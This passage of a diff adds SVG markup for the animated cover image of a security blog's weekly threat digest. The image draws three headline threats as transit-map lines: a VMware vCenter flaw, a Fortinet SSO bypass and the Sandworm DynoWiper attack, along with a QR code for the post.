+  <text x="60" y="55" font-family="Helvetica, Arial, sans-serif" font-size="28" font-weight="800" fill="#E9EEF8" letter-spacing="1.2">
+    WEEKLY THREAT DIGEST
+    <animate attributeName="fill" values="#E9EEF8;#8FB8FF;#E9EEF8" dur="6s" repeatCount="indefinite"/>
+  </text>
+  <text x="60" y="82" font-family="Helvetica, Arial, sans-serif" font-size="15" font-weight="500" fill="#8899BB" letter-spacing="0.8">2026.01.25  |  VMware KEV  ·  Fortinet SSO  ·  Sandworm DynoWiper</text>
+</g>
+
+<!-- Legend top-right -->
+<g transform="translate(1010,52)" filter="url(#textShadow)">
+  <rect x="-6" y="-26" width="178" height="52" rx="10" fill="#14213E" stroke="#3A4E82" stroke-width="1.2">
+  </rect>
+  <circle cx="8" cy="0" r="5" fill="#E63946">
+  </circle>
+  <circle cx="8" cy="0" r="5" fill="url(#pulseRed)" opacity="0.9">
+  </circle>
+  <text x="22" y="5" font-family="Helvetica, Arial, sans-serif" font-size="14" font-weight="700" fill="#E9EEF8">CRITICAL</text>
+  <circle cx="102" cy="0" r="5" fill="#FFA107">
+  </circle>
+  <text x="116" y="5" font-family="Helvetica, Arial, sans-serif" font-size="14" font-weight="700" fill="#E9EEF8">HIGH</text>
+</g>
+
+<!-- ==================== LINE 1: VMware vCenter KEV (RED) ==================== -->
+<g>
+  <!-- Track glow -->
+  <line x1="120" y1="170" x2="1080" y2="170" stroke="#E63946" stroke-width="18" stroke-linecap="round" opacity="0.25" filter="url(#glowRed)">
+    <animate attributeName="opacity" values="0.2;0.4;0.2" dur="3s" repeatCount="indefinite"/>
+  </line>
+  <!-- Track solid -->
+  <line x1="120" y1="170" x2="1080" y2="170" stroke="#E63946" stroke-width="9" stroke-linecap="round"/>
+  <!-- L1 badge -->
+  <g transform="translate(60,170)" filter="url(#textShadow)">
+    <rect x="-8" y="-16" width="60" height="32" rx="6" fill="#E63946">
+      <animate attributeName="fill" values="#E63946;#FF6B7A;#E63946" dur="4s" repeatCount="indefinite"/>
+    </rect>
+    <text x="22" y="6" font-family="Helvetica, Arial, sans-serif" font-size="18" font-weight="900" fill="#FFFFFF" text-anchor="middle">L1</text>
+  </g>
+  <!-- Traveler -->
+  <circle r="10" fill="#FFE1E4" stroke="#FFFFFF" stroke-width="2">
+    <animate attributeName="cx" values="120;1080;120" dur="9s" repeatCount="indefinite"/>
+    <animate attributeName="opacity" values="0;1;1;1;0" dur="9s" repeatCount="indefinite"/>
+  </circle>
+
+  <!-- Station 1A: vSphere -->
+  <g transform="translate(200,170)">
+    <circle r="20" fill="url(#pulseRed)">
+      <animate attributeName="r" values="20;30;20" dur="2.8s" repeatCount="indefinite"/>
+    </circle>
+    <circle r="13" fill="#0A1020" stroke="#E63946" stroke-width="4" filter="url(#stationShadow)"/>
+    <circle r="4" fill="#FF4D5E">
+    </circle>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="200" y="135" font-family="Helvetica, Arial, sans-serif" font-size="16" font-weight="800" fill="#FFFFFF" text-anchor="middle">vSphere</text>
+    <text x="200" y="208" font-family="Helvetica, Arial, sans-serif" font-size="13" font-weight="600" fill="#FFB8BE" text-anchor="middle">Expose</text>
+  </g>
+
+  <!-- Station 1B: CVE-2024-37079 -->
+  <g transform="translate(390,170)">
+    <circle r="15" fill="#0A1020" stroke="#E63946" stroke-width="4" filter="url(#stationShadow)"/>
+    <circle r="6" fill="#E63946">
+    </circle>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="390" y="135" font-family="Helvetica, Arial, sans-serif" font-size="14" font-weight="900" fill="#FFE1E4" text-anchor="middle">CVE-2024-37079</text>
+    <text x="390" y="208" font-family="Helvetica, Arial, sans-serif" font-size="13" font-weight="700" fill="#E63946" text-anchor="middle">CVSS 9.8</text>
+  </g>
+
+  <!-- Station 1C: HEAP-OOB -->
+  <g transform="translate(580,170)">
+    <rect x="-18" y="-14" width="36" height="28" fill="#0A1020" stroke="#E63946" stroke-width="4" filter="url(#stationShadow)">
+    </rect>
+    <text y="5" text-anchor="middle" font-family="Helvetica, Arial, sans-serif" font-size="11" font-weight="900" fill="#FF4D5E">OOB</text>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="580" y="135" font-family="Helvetica, Arial, sans-serif" font-size="16" font-weight="800" fill="#FFFFFF" text-anchor="middle">HEAP Overflow</text>
+    <text x="580" y="208" font-family="Helvetica, Arial, sans-serif" font-size="13" font-weight="600" fill="#FFB8BE" text-anchor="middle">Memory</text>
+  </g>
+
+  <!-- Station 1D: Privilege Escalation -->
+  <g transform="translate(790,170)">
+    <polygon points="-15,-14 15,-14 0,14" fill="#0A1020" stroke="#E63946" stroke-width="4" filter="url(#stationShadow)">
+      <animateTransform attributeName="transform" type="rotate" values="0;360" dur="14s" repeatCount="indefinite"/>
+    </polygon>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="790" y="135" font-family="Helvetica, Arial, sans-serif" font-size="16" font-weight="800" fill="#FFFFFF" text-anchor="middle">Priv Escalation</text>
+    <text x="790" y="208" font-family="Helvetica, Arial, sans-serif" font-size="13" font-weight="600" fill="#FFB8BE" text-anchor="middle">Root</text>
+  </g>
+
+  <!-- Terminus 1: KEV -->
+  <g transform="translate(1050,170)">
+    <circle r="22" fill="none" stroke="#E63946" stroke-width="3" stroke-dasharray="4 3">
+      <animateTransform attributeName="transform" type="rotate" values="0;360" dur="8s" repeatCount="indefinite"/>
+    </circle>
+    <circle r="14" fill="#E63946" filter="url(#stationShadow)">
+      <animate attributeName="fill" values="#E63946;#FF4D5E;#E63946" dur="2s" repeatCount="indefinite"/>
+    </circle>
+    <text y="5" text-anchor="middle" font-family="Helvetica, Arial, sans-serif" font-size="12" font-weight="900" fill="#FFFFFF">KEV</text>
+  </g>
+</g>
+
+<!-- ==================== LINE 2: Fortinet SSO Bypass (AMBER) ==================== -->
+<g>
+  <line x1="120" y1="330" x2="1080" y2="330" stroke="#FFA107" stroke-width="18" stroke-linecap="round" opacity="0.25" filter="url(#glowAmber)">
+    <animate attributeName="opacity" values="0.2;0.4;0.2" dur="3s" repeatCount="indefinite" begin="0.7s"/>
+  </line>
+  <line x1="120" y1="330" x2="1080" y2="330" stroke="#FFA107" stroke-width="9" stroke-linecap="round"/>
+  <g transform="translate(60,330)" filter="url(#textShadow)">
+    <rect x="-8" y="-16" width="60" height="32" rx="6" fill="#FFA107">
+    </rect>
+    <text x="22" y="6" font-family="Helvetica, Arial, sans-serif" font-size="18" font-weight="900" fill="#1A1202" text-anchor="middle">L2</text>
+  </g>
+  <circle r="10" fill="#FFF0C9" stroke="#FFFFFF" stroke-width="2">
+    <animate attributeName="cx" values="120;1080;120" dur="10s" repeatCount="indefinite"/>
+    <animate attributeName="opacity" values="0;1;1;1;0" dur="10s" repeatCount="indefinite"/>
+  </circle>
+
+  <!-- Station 2A: FortiGate -->
+  <g transform="translate(200,330)">
+    <circle r="20" fill="url(#pulseAmber)">
+      <animate attributeName="r" values="20;30;20" dur="3s" repeatCount="indefinite"/>
+    </circle>
+    <circle r="13" fill="#0A1020" stroke="#FFA107" stroke-width="4" filter="url(#stationShadow)"/>
+    <circle r="4" fill="#FFC43D">
+    </circle>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="200" y="295" font-family="Helvetica, Arial, sans-serif" font-size="16" font-weight="800" fill="#FFFFFF" text-anchor="middle">FortiGate</text>
+    <text x="200" y="368" font-family="Helvetica, Arial, sans-serif" font-size="13" font-weight="600" fill="#FFD98A" text-anchor="middle">Fully Patched</text>
+  </g>
+
+  <!-- Station 2B: FortiCloud SSO -->
+  <g transform="translate(390,330)">
+    <circle r="15" fill="#0A1020" stroke="#FFA107" stroke-width="4" filter="url(#stationShadow)"/>
+    <circle r="6" fill="#FFA107">
+    </circle>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="390" y="295" font-family="Helvetica, Arial, sans-serif" font-size="16" font-weight="800" fill="#FFFFFF" text-anchor="middle">FortiCloud SSO</text>
+    <text x="390" y="368" font-family="Helvetica, Arial, sans-serif" font-size="13" font-weight="600" fill="#FFD98A" text-anchor="middle">Auth Flow</text>
+  </g>
+
+  <!-- Station 2C: Token Forge -->
+  <g transform="translate(580,330)">
+    <rect x="-18" y="-14" width="36" height="28" fill="#0A1020" stroke="#FFA107" stroke-width="4" filter="url(#stationShadow)">
+    </rect>
+    <text y="5" text-anchor="middle" font-family="Helvetica, Arial, sans-serif" font-size="10" font-weight="900" fill="#FFC43D">JWT</text>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="580" y="295" font-family="Helvetica, Arial, sans-serif" font-size="16" font-weight="800" fill="#FFFFFF" text-anchor="middle">Token Forge</text>
+    <text x="580" y="368" font-family="Helvetica, Arial, sans-serif" font-size="13" font-weight="600" fill="#FFD98A" text-anchor="middle">Zero-Day</text>
+  </g>
+
+  <!-- Station 2D: Lateral Move -->
+  <g transform="translate(790,330)">
+    <polygon points="-15,-14 15,-14 0,14" fill="#0A1020" stroke="#FFA107" stroke-width="4" filter="url(#stationShadow)">
+      <animateTransform attributeName="transform" type="rotate" values="0;-360" dur="12s" repeatCount="indefinite"/>
+    </polygon>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="790" y="295" font-family="Helvetica, Arial, sans-serif" font-size="16" font-weight="800" fill="#FFFFFF" text-anchor="middle">Lateral Move</text>
+    <text x="790" y="368" font-family="Helvetica, Arial, sans-serif" font-size="13" font-weight="600" fill="#FFD98A" text-anchor="middle">Internal</text>
+  </g>
+
+  <!-- Terminus 2: Persist -->
+  <g transform="translate(1050,330)">
+    <circle r="22" fill="none" stroke="#FFA107" stroke-width="3" stroke-dasharray="4 3">
+      <animateTransform attributeName="transform" type="rotate" values="0;360" dur="9s" repeatCount="indefinite"/>
+    </circle>
+    <circle r="14" fill="#FFA107" filter="url(#stationShadow)">
+      <animate attributeName="fill" values="#FFA107;#FFC43D;#FFA107" dur="2.4s" repeatCount="indefinite"/>
+    </circle>
+    <text y="5" text-anchor="middle" font-family="Helvetica, Arial, sans-serif" font-size="10" font-weight="900" fill="#1A1202">P0</text>
+  </g>
+</g>
+
+<!-- ==================== LINE 3: Sandworm DynoWiper (CYAN) ==================== -->
+<g>
+  <line x1="120" y1="490" x2="1080" y2="490" stroke="#2AA8CE" stroke-width="18" stroke-linecap="round" opacity="0.25" filter="url(#glowCyan)">
+    <animate attributeName="opacity" values="0.2;0.4;0.2" dur="3s" repeatCount="indefinite" begin="1.4s"/>
+  </line>
+  <line x1="120" y1="490" x2="1080" y2="490" stroke="#2AA8CE" stroke-width="9" stroke-linecap="round"/>
+  <g transform="translate(60,490)" filter="url(#textShadow)">
+    <rect x="-8" y="-16" width="60" height="32" rx="6" fill="#2AA8CE">
+    </rect>
+    <text x="22" y="6" font-family="Helvetica, Arial, sans-serif" font-size="18" font-weight="900" fill="#001820" text-anchor="middle">L3</text>
+  </g>
+  <circle r="10" fill="#C8F4FF" stroke="#FFFFFF" stroke-width="2">
+    <animate attributeName="cx" values="120;1080;120" dur="11s" repeatCount="indefinite"/>
+    <animate attributeName="opacity" values="0;1;1;1;0" dur="11s" repeatCount="indefinite"/>
+  </circle>
+
+  <!-- Station 3A: Sandworm APT -->
+  <g transform="translate(200,490)">
+    <circle r="20" fill="url(#pulseCyan)">
+      <animate attributeName="r" values="20;30;20" dur="3.2s" repeatCount="indefinite"/>
+    </circle>
+    <circle r="13" fill="#0A1020" stroke="#2AA8CE" stroke-width="4" filter="url(#stationShadow)"/>
+    <circle r="4" fill="#5FD3F3">
+    </circle>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="200" y="455" font-family="Helvetica, Arial, sans-serif" font-size="16" font-weight="800" fill="#FFFFFF" text-anchor="middle">Sandworm</text>
+    <text x="200" y="528" font-family="Helvetica, Arial, sans-serif" font-size="13" font-weight="600" fill="#9ADEEF" text-anchor="middle">APT / GRU</text>
+  </g>
+
+  <!-- Station 3B: Grid Target -->
+  <g transform="translate(390,490)">
+    <circle r="15" fill="#0A1020" stroke="#2AA8CE" stroke-width="4" filter="url(#stationShadow)"/>
+    <circle r="6" fill="#2AA8CE">
+    </circle>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="390" y="455" font-family="Helvetica, Arial, sans-serif" font-size="16" font-weight="800" fill="#FFFFFF" text-anchor="middle">Poland Grid</text>
+    <text x="390" y="528" font-family="Helvetica, Arial, sans-serif" font-size="13" font-weight="600" fill="#9ADEEF" text-anchor="middle">OT Network</text>
+  </g>
+
+  <!-- Station 3C: DynoWiper Deploy -->
+  <g transform="translate(580,490)">
+    <rect x="-22" y="-14" width="44" height="28" fill="#0A1020" stroke="#2AA8CE" stroke-width="4" filter="url(#stationShadow)">
+    </rect>
+    <text y="5" text-anchor="middle" font-family="Helvetica, Arial, sans-serif" font-size="10" font-weight="900" fill="#5FD3F3">WIPER</text>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="580" y="455" font-family="Helvetica, Arial, sans-serif" font-size="16" font-weight="800" fill="#FFFFFF" text-anchor="middle">DynoWiper</text>
+    <text x="580" y="528" font-family="Helvetica, Arial, sans-serif" font-size="13" font-weight="600" fill="#9ADEEF" text-anchor="middle">Deploy</text>
+  </g>
+
+  <!-- Station 3D: Data Wipe -->
+  <g transform="translate(790,490)">
+    <polygon points="-15,-14 15,-14 0,14" fill="#0A1020" stroke="#2AA8CE" stroke-width="4" filter="url(#stationShadow)">
+      <animateTransform attributeName="transform" type="rotate" values="0;360" dur="16s" repeatCount="indefinite"/>
+    </polygon>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="790" y="455" font-family="Helvetica, Arial, sans-serif" font-size="16" font-weight="800" fill="#FFFFFF" text-anchor="middle">Data Wipe</text>
+    <text x="790" y="528" font-family="Helvetica, Arial, sans-serif" font-size="13" font-weight="600" fill="#9ADEEF" text-anchor="middle">MBR Erase</text>
+  </g>
+
+  <!-- Terminus 3: Blackout -->
+  <g transform="translate(1050,490)">
+    <circle r="22" fill="none" stroke="#2AA8CE" stroke-width="3" stroke-dasharray="4 3">
+      <animateTransform attributeName="transform" type="rotate" values="0;360" dur="10s" repeatCount="indefinite"/>
+    </circle>
+    <circle r="14" fill="#2AA8CE" filter="url(#stationShadow)">
+      <animate attributeName="fill" values="#2AA8CE;#5FD3F3;#2AA8CE" dur="3s" repeatCount="indefinite"/>
+    </circle>
+    <text y="5" text-anchor="middle" font-family="Helvetica, Arial, sans-serif" font-size="9" font-weight="900" fill="#001820">DARK</text>
+  </g>
+</g>
+
+<!-- Line labels right side -->
+<g filter="url(#textShadow)" font-family="Helvetica, Arial, sans-serif">
+  <text x="1140" y="175" font-size="12" font-weight="700" fill="#E63946" text-anchor="middle">VMware</text>
+  <text x="1140" y="190" font-size="11" font-weight="500" fill="#FFB8BE" text-anchor="middle">vCenter</text>
+  <text x="1140" y="335" font-size="12" font-weight="700" fill="#FFA107" text-anchor="middle">Fortinet</text>
+  <text x="1140" y="350" font-size="11" font-weight="500" fill="#FFD98A" text-anchor="middle">SSO Bypass</text>
+  <text x="1140" y="495" font-size="12" font-weight="700" fill="#2AA8CE" text-anchor="middle">Sandworm</text>
+  <text x="1140" y="510" font-size="11" font-weight="500" fill="#9ADEEF" text-anchor="middle">DynoWiper</text>
+</g>
+
+<!-- Footer date stamp -->
+<g filter="url(#textShadow)">
+  <text x="60" y="610" font-family="Helvetica, Arial, sans-serif" font-size="13" font-weight="500" fill="#4A6090" letter-spacing="0.6">DevSecOps Weekly  |  CISA KEV  ·  Zero-Day  ·  APT  ·  ICS/OT</text>
+  <text x="1140" y="610" font-family="Helvetica, Arial, sans-serif" font-size="13" font-weight="700" fill="#3A5080" text-anchor="end">tech.2twodragon.com</text>
+</g>
+
+<!-- cover-qr: https://tech.2twodragon.com/posts/2026/01/25/Tech_Security_Weekly_Digest_VMware_vCenter_Fortinet_SSO_Sandworm_DynoWiper_AI_Agents/ : 49x49 -->
+<g transform="translate(1080,504)" filter="url(#softShadow)">
+  <rect x="-8" y="-8" width="100" height="100" rx="6" fill="#FFFFFF"/>
+  <g transform="scale(1.714286)" fill="#0A1020">
+    <path d="M0 0h7v1h-7zM8 0h1v1h-1zM11 0h3v1h-3zM17 0h1v1h-1zM21 0h1v1h-1zM24 0h4v1h-4zM30 0h1v1h-1zM32 0h1v1h-1zM35 0h1v1h-1zM37 0h1v1h-1zM40 0h1v1h-1zM42 0h7v1h-7zM0 1h1v1h-1zM6 1h1v1h-1zM9 1h1v1h-1zM12 1h4v1h-4zM17 1h2v1h-2zM21 1h4v1h-4zM26 1h1v1h-1zM29 1h4v1h-4zM35 1h1v1h-1zM38 1h3v1h-3zM42 1h1v1h-1zM48 1h1v1h-1zM0 2h1v1h-1zM2 2h3v1h-3zM6 2h1v1h-1zM9 2h3v1h-3zM15 2h1v1h-1zM18 2h2v1h-2zM22 2h1v1h-1zM25 2h3v1h-3zM30 2h2v1h-2zM34 2h1v1h-1zM36 2h1v1h-1zM39 2h2v1h-2zM42 2h1v1h-1zM44 2h3v1h-3zM48 2h1v1h-1zM0 3h1v1h-1zM2 3h3v1h-3zM6 3h1v1h-1zM8 3h1v1h-1zM10 3h1v1h-1zM15 3h5v1h-5zM22 3h2v1h-2zM25 3h2v1h-2zM28 3h1v1h-1zM30 3h2v1h-2zM37 3h1v1h-1zM39 3h1v1h-1zM42 3h1v1h-1zM44 3h3v1h-3zM48 3h1v1h-1zM0 4h1v1h-1zM2 4h3v1h-3zM6 4h1v1h-1zM8 4h1v1h-1zM10 4h2v1h-2zM14 4h2v1h-2zM19 4h2v1h-2zM22 4h6v1h-6zM29 4h2v1h-2zM33 4h1v1h-1zM42 4h1v1h-1zM44 4h3v1h-3zM48 4h1v1h-1zM0 5h1v1h-1zM6 5h1v1h-1zM8 5h1v1h-1zM11 5h1v1h-1zM14 5h1v1h-1zM17 5h1v1h-1zM20 5h3v1h-3zM26 5h1v1h-1zM34 5h1v1h-1zM36 5h3v1h-3zM42 5h1v1h-1zM48 5h1v1h-1zM0 6h7v1h-7zM8 6h1v1h-1zM10 6h1v1h-1zM12 6h1v1h-1zM14 6h1v1h-1zM16 6h1v1h-1zM18 6h1v1h-1zM20 6h1v1h-1zM22 6h1v1h-1zM24 6h1v1h-1zM26 6h1v1h-1zM28 6h1v1h-1zM30 6h1v1h-1zM32 6h1v1h-1zM34 6h1v1h-1zM36 6h1v1h-1zM38 6h1v1h-1zM40 6h1v1h-1zM42 6h7v1h-7zM8 7h2v1h-2zM11 7h1v1h-1zM14 7h1v1h-1zM16 7h2v1h-2zM22 7h1v1h-1zM26 7h1v1h-1zM28 7h1v1h-1zM31 7h1v1h-1zM34 7h1v1h-1zM36 7h1v1h-1zM40 7h1v1h-1zM0 8h1v1h-1zM4 8h1v1h-1zM6 8h3v1h-3zM10 8h1v1h-1zM14 8h6v1h-6zM21 8h7v1h-7zM29 8h1v1h-1zM32 8h2v1h-2zM35 8h2v1h-2zM40 8h6v1h-6zM48 8h1v1h-1zM0 9h4v1h-4zM8 9h1v1h-1zM10 9h1v1h-1zM12 9h6v1h-6zM20 9h1v1h-1zM23 9h2v1h-2zM26 9h2v1h-2zM29 9h2v1h-2zM33 9h1v1h-1zM35 9h1v1h-1zM38 9h2v1h-2zM41 9h2v1h-2zM47 9h1v1h-1zM0 10h1v1h-1zM3 10h2v1h-2zM6 10h1v1h-1zM12 10h2v1h-2zM17 10h2v1h-2zM20 10h2v1h-2zM23 10h1v1h-1zM25 10h3v1h-3zM29 10h4v1h-4zM35 10h1v1h-1zM38 10h1v1h-1zM40 10h2v1h-2zM43 10h2v1h-2zM46 10h2v1h-2zM1 11h1v1h-1zM3 11h1v1h-1zM12 11h1v1h-1zM14 11h2v1h-2zM18 11h3v1h-3zM22 11h1v1h-1zM24 11h4v1h-4zM29 11h1v1h-1zM32 11h1v1h-1zM34 11h1v1h-1zM36 11h2v1h-2zM39 11h4v1h-4zM46 11h1v1h-1zM48 11h1v1h-1zM0 12h2v1h-2zM3 12h1v1h-1zM5 12h3v1h-3zM9 12h1v1h-1zM11 12h1v1h-1zM13 12h1v1h-1zM15 12h2v1h-2zM18 12h3v1h-3zM22 12h3v1h-3zM29 12h1v1h-1zM32 12h1v1h-1zM35 12h2v1h-2zM38 12h1v1h-1zM40 12h1v1h-1zM44 12h4v1h-4zM0 13h1v1h-1zM2 13h3v1h-3zM7 13h3v1h-3zM11 13h1v1h-1zM21 13h3v1h-3zM26 13h2v1h-2zM29 13h2v1h-2zM33 13h1v1h-1zM36 13h1v1h-1zM38 13h2v1h-2zM42 13h2v1h-2zM46 13h2v1h-2zM0 14h1v1h-1zM3 14h1v1h-1zM5 14h5v1h-5zM11 14h1v1h-1zM15 14h3v1h-3zM20 14h2v1h-2zM24 14h1v1h-1zM31 14h1v1h-1zM33 14h1v1h-1zM37 14h7v1h-7zM46 14h1v1h-1zM1 15h1v1h-1zM3 15h3v1h-3zM8 15h4v1h-4zM13 15h3v1h-3zM17 15h1v1h-1zM19 15h2v1h-2zM23 15h6v1h-6zM30 15h1v1h-1zM35 15h3v1h-3zM40 15h1v1h-1zM43 15h2v1h-2zM46 15h2v1h-2zM0 16h1v1h-1zM5 16h2v1h-2zM8 16h1v1h-1zM10 16h2v1h-2zM14 16h3v1h-3zM19 16h1v1h-1zM23 16h3v1h-3zM27 16h2v1h-2zM34 16h1v1h-1zM36 16h1v1h-1zM40 16h7v1h-7zM0 17h4v1h-4zM10 17h1v1h-1zM14 17h4v1h-4zM20 17h1v1h-1zM23 17h1v1h-1zM26 17h1v1h-1zM28 17h2v1h-2zM31 17h1v1h-1zM33 17h3v1h-3zM38 17h2v1h-2zM42 17h2v1h-2zM45 17h1v1h-1zM2 18h3v1h-3zM6 18h2v1h-2zM9 18h3v1h-3zM13 18h1v1h-1zM15 18h1v1h-1zM18 18h2v1h-2zM26 18h1v1h-1zM29 18h1v1h-1zM31 18h5v1h-5zM38 18h1v1h-1zM40 18h3v1h-3zM45 18h2v1h-2zM1 19h4v1h-4zM7 19h1v1h-1zM9 19h1v1h-1zM13 19h1v1h-1zM16 19h3v1h-3zM20 19h3v1h-3zM24 19h4v1h-4zM30 19h2v1h-2zM36 19h1v1h-1zM40 19h2v1h-2zM43 19h2v1h-2zM46 19h1v1h-1zM48 19h1v1h-1zM0 20h1v1h-1zM5 20h2v1h-2zM9 20h1v1h-1zM11 20h1v1h-1zM13 20h3v1h-3zM18 20h3v1h-3zM22 20h4v1h-4zM27 20h1v1h-1zM32 20h5v1h-5zM40 20h2v1h-2zM43 20h6v1h-6zM0 21h1v1h-1zM2 21h4v1h-4zM7 21h2v1h-2zM10 21h3v1h-3zM14 21h1v1h-1zM16 21h1v1h-1zM18 21h1v1h-1zM20 21h1v1h-1zM23 21h1v1h-1zM27 21h2v1h-2zM30 21h4v1h-4zM35 21h1v1h-1zM38 21h2v1h-2zM41 21h2v1h-2zM3 22h6v1h-6zM13 22h2v1h-2zM17 22h1v1h-1zM20 22h1v1h-1zM22 22h10v1h-10zM33 22h1v1h-1zM36 22h1v1h-1zM38 22h9v1h-9zM0 23h2v1h-2zM3 23h2v1h-2zM8 23h1v1h-1zM13 23h2v1h-2zM16 23h1v1h-1zM18 23h2v1h-2zM22 23h1v1h-1zM26 23h1v1h-1zM31 23h1v1h-1zM33 23h4v1h-4zM38 23h3v1h-3zM44 23h3v1h-3zM48 23h1v1h-1zM4 24h1v1h-1zM6 24h1v1h-1zM8 24h1v1h-1zM12 24h1v1h-1zM14 24h1v1h-1zM22 24h1v1h-1zM24 24h1v1h-1zM26 24h2v1h-2zM29 24h2v1h-2zM32 24h1v1h-1zM34 24h7v1h-7zM42 24h1v1h-1zM44 24h5v1h-5zM4 25h1v1h-1zM8 25h1v1h-1zM10 25h1v1h-1zM14 25h1v1h-1zM16 25h1v1h-1zM19 25h4v1h-4zM26 25h1v1h-1zM29 25h2v1h-2zM32 25h2v1h-2zM35 25h2v1h-2zM38 25h1v1h-1zM40 25h1v1h-1zM44 25h1v1h-1zM0 26h2v1h-2zM4 26h5v1h-5zM10 26h1v1h-1zM12 26h4v1h-4zM22 26h5v1h-5zM29 26h2v1h-2zM32 26h2v1h-2zM37 26h1v1h-1zM39 26h7v1h-7zM47 26h1v1h-1zM0 27h4v1h-4zM5 27h1v1h-1zM8 27h1v1h-1zM11 27h3v1h-3zM15 27h1v1h-1zM18 27h1v1h-1zM23 27h1v1h-1zM27 27h1v1h-1zM29 27h1v1h-1zM32 27h2v1h-2zM36 27h1v1h-1zM39 27h1v1h-1zM41 27h2v1h-2zM46 27h3v1h-3zM2 28h1v1h-1zM5 28h4v1h-4zM11 28h1v1h-1zM13 28h1v1h-1zM15 28h1v1h-1zM17 28h1v1h-1zM20 28h1v1h-1zM22 28h1v1h-1zM24 28h4v1h-4zM29 28h1v1h-1zM32 28h2v1h-2zM35 28h3v1h-3zM40 28h1v1h-1zM42 28h1v1h-1zM44 28h1v1h-1zM46 28h3v1h-3zM0 29h1v1h-1zM2 29h2v1h-2zM5 29h1v1h-1zM7 29h3v1h-3zM13 29h1v1h-1zM15 29h2v1h-2zM19 29h2v1h-2zM22 29h2v1h-2zM25 29h6v1h-6zM32 29h2v1h-2zM38 29h5v1h-5zM44 29h1v1h-1zM1 30h1v1h-1zM3 30h4v1h-4zM8 30h1v1h-1zM10 30h3v1h-3zM14 30h1v1h-1zM17 30h3v1h-3zM21 30h1v1h-1zM23 30h3v1h-3zM29 30h1v1h-1zM33 30h1v1h-1zM35 30h1v1h-1zM37 30h1v1h-1zM44 30h3v1h-3zM0 31h4v1h-4zM7 31h3v1h-3zM15 31h2v1h-2zM21 31h1v1h-1zM24 31h1v1h-1zM26 31h1v1h-1zM28 31h2v1h-2zM31 31h1v1h-1zM33 31h2v1h-2zM36 31h2v1h-2zM41 31h1v1h-1zM46 31h3v1h-3zM0 32h1v1h-1zM4 32h4v1h-4zM9 32h2v1h-2zM13 32h2v1h-2zM16 32h1v1h-1zM18 32h1v1h-1zM26 32h1v1h-1zM29 32h5v1h-5zM35 32h2v1h-2zM38 32h1v1h-1zM41 32h1v1h-1zM46 32h1v1h-1zM48 32h1v1h-1zM0 33h1v1h-1zM4 33h2v1h-2zM7 33h9v1h-9zM17 33h2v1h-2zM20 33h1v1h-1zM22 33h6v1h-6zM30 33h1v1h-1zM32 33h1v1h-1zM36 33h1v1h-1zM38 33h4v1h-4zM44 33h2v1h-2zM47 33h2v1h-2zM1 34h1v1h-1zM3 34h1v1h-1zM6 34h2v1h-2zM9 34h3v1h-3zM13 34h1v1h-1zM16 34h3v1h-3zM21 34h2v1h-2zM24 34h2v1h-2zM27 34h2v1h-2zM34 34h1v1h-1zM38 34h1v1h-1zM40 34h2v1h-2zM43 34h4v1h-4zM3 35h1v1h-1zM8 35h2v1h-2zM12 35h2v1h-2zM15 35h5v1h-5zM26 35h1v1h-1zM28 35h1v1h-1zM30 35h3v1h-3zM34 35h3v1h-3zM38 35h1v1h-1zM41 35h4v1h-4zM46 35h1v1h-1zM48 35h1v1h-1zM0 36h4v1h-4zM5 36h7v1h-7zM15 36h2v1h-2zM18 36h1v1h-1zM20 36h3v1h-3zM26 36h2v1h-2zM32 36h1v1h-1zM35 36h4v1h-4zM41 36h1v1h-1zM45 36h3v1h-3zM0 37h2v1h-2zM4 37h2v1h-2zM11 37h1v1h-1zM13 37h1v1h-1zM15 37h1v1h-1zM17 37h2v1h-2zM20 37h1v1h-1zM22 37h9v1h-9zM32 37h2v1h-2zM37 37h2v1h-2zM40 37h2v1h-2zM43 37h2v1h-2zM47 37h1v1h-1zM1 38h1v1h-1zM5 38h2v1h-2zM8 38h1v1h-1zM11 38h2v1h-2zM14 38h7v1h-7zM22 38h1v1h-1zM25 38h1v1h-1zM29 38h3v1h-3zM38 38h2v1h-2zM43 38h2v1h-2zM46 38h1v1h-1zM1 39h3v1h-3zM7 39h3v1h-3zM11 39h2v1h-2zM15 39h2v1h-2zM18 39h4v1h-4zM23 39h5v1h-5zM31 39h3v1h-3zM35 39h4v1h-4zM43 39h4v1h-4zM0 40h3v1h-3zM6 40h4v1h-4zM11 40h2v1h-2zM14 40h3v1h-3zM18 40h1v1h-1zM21 40h7v1h-7zM29 40h2v1h-2zM32 40h2v1h-2zM35 40h2v1h-2zM40 40h5v1h-5zM46 40h2v1h-2zM8 41h2v1h-2zM11 41h1v1h-1zM13 41h1v1h-1zM16 41h1v1h-1zM19 41h2v1h-2zM22 41h1v1h-1zM26 41h8v1h-8zM35 41h1v1h-1zM38 41h3v1h-3zM44 41h2v1h-2zM47 41h1v1h-1zM0 42h7v1h-7zM8 42h1v1h-1zM10 42h2v1h-2zM13 42h1v1h-1zM15 42h2v1h-2zM18 42h1v1h-1zM20 42h3v1h-3zM24 42h1v1h-1zM26 42h2v1h-2zM29 42h3v1h-3zM35 42h1v1h-1zM37 42h1v1h-1zM40 42h1v1h-1zM42 42h1v1h-1zM44 42h1v1h-1zM46 42h2v1h-2zM0 43h1v1h-1zM6 43h1v1h-1zM11 43h1v1h-1zM15 43h3v1h-3zM21 43h2v1h-2zM26 43h2v1h-2zM30 43h1v1h-1zM32 43h1v1h-1zM36 43h3v1h-3zM40 43h1v1h-1zM44 43h1v1h-1zM46 43h3v1h-3zM0 44h1v1h-1zM2 44h3v1h-3zM6 44h1v1h-1zM8 44h3v1h-3zM12 44h1v1h-1zM17 44h11v1h-11zM29 44h1v1h-1zM32 44h1v1h-1zM34 44h1v1h-1zM36 44h1v1h-1zM39 44h7v1h-7zM48 44h1v1h-1zM0 45h1v1h-1zM2 45h3v1h-3zM6 45h1v1h-1zM10 45h1v1h-1zM17 45h1v1h-1zM21 45h1v1h-1zM23 45h1v1h-1zM25 45h7v1h-7zM33 45h1v1h-1zM38 